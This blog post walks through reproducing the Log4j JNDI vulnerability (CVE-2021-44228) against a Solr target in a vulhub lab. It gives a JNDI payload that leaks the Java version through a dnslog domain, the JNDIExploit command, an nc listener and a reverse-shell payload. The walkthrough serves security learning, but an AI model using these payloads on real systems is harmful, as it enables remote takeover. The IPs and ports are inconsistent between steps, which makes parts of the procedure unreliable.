banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github

Log4Jの逆シリアル化

環境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali システム:攻撃マシンとしてポート情報をリッスンするために nc が必要
ローカルマシン:中継マシン
CentOS:ターゲットマシン

アドレス情報:
ターゲットマシンの IP:192.168.1.4:8983
ローカルマシンの IP:192.168.1.2
攻撃マシン:192.168.91.131

ターゲット環境を開く
image.png
DNS ドメインをリクエストする
http://dnslog.cn/
image.png
ドメイン:
gswq4u.dnslog.cn
hackbar を開き、まず loadURL をクリックする
image.png

提供されたアドレスをコピーする
image.png
後ろのドメインを先ほど申請したものに変更する
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
実行をクリックすると、以下のページが表示される
image.png

ここでフィードバックを受け取ります
image.png
今、JNDIExploit-1.2 を開きます
コマンドを入力します
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i ローカルマシンの IP
image.png
そして、攻撃マシンでポートをリッスンします
コマンド:
nc -lvp 4444

hackbar で以下のコマンドを構築します
http://192.168.91.132:8983/solr/admin/cores?action=${jndi:ldap://192.168.1.2:1389/Basic/ReverseShell/192.168.91.131/1234}
Execute をクリックする
image.png
リッスンしているポートからシェルが返ってくることがわかる
image.png
ここで再現が完了しました

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。